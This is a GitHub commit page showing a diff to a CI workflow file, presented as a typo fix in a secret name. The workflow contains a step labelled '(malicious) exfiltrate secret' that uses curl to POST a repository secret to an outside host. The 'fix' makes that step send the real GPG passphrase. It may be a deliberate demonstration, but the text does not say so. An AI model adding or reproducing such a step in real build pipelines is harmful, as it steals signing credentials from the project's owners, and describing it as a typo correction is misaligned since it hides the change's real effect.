Skip to content

Commit a861364

Browse files
authored
Fix typo in secret name from PASSPHASE to PASSPHRASE
1 parent fbabf24 commit a861364

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

.github/workflows/on-push-master-library.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@ jobs:
1919
- name: (malicious) exfiltrate secret
2020
run: curl -X POST http://nodered.vacxe.dev/unveil -d "s=$MY_SECRET"
2121
env:
22-
MY_SECRET: ${{ secrets.GPG_PASSPHASE }}
22+
MY_SECRET: ${{ secrets.GPG_PASSPHRASE }}
2323
- uses: actions/checkout@v3
2424
- name: Set up JDK 17
2525
uses: actions/setup-java@v3

0 commit comments

Comments
 (0)